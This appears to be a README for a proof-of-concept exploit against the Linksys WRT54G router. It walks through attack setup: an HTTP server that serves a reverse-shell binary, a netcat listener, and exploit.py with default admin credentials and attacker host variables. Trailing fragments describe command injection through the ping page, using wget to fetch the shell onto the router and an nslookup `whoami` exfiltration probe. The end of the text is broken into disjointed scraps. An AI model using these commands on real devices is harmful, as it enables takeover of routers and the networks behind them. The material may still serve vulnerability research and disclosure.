Exploiting Linksys WRT54G using a vulnerability I found.
# Install the requirements.
pip install -r requirements.txt
ROUTER_HOST=192.169.1.1
ROUTER_USERNAME=admin
ROUTER_PASSWORD=admin
ATTACKER_HOST=192.169.1.100
ATTACKER_HTTP_SERVER_PORT=8000
ATTACKER_REVSHELL_HANDLER_PORT=4141
# Start HTTP server in order to serve the reverse shell executable.
cd revshell
python -m SimpleHTTPServer $ATTACKER_HTTP_SERVER_PORT
# Start reverse shell handler.
nc -l $ATTACKER_REVSHELL_HANDLER_PORT
# Run the exploit.
python exploit.py --host $ROUTER_HOST --username $ROUTER_USERNAME --password $ROUTER_PASSWORD --attacker-host $ATTACKER_HOST --attacker-http-port $ATTACKER_HTTP_SERVER_PORT --attacker-handler-port $ATTACKER_REVSHELL_HANDLER_PORT
/tmp/ping.log
to view the output at /Ping.asp
.wget
to download reverse shell binary to the router.nslookup `whoami`.fake.domain
ui_language
is stored in nvram (Non-Volatile Memory), how come it fixes itself upon reboot?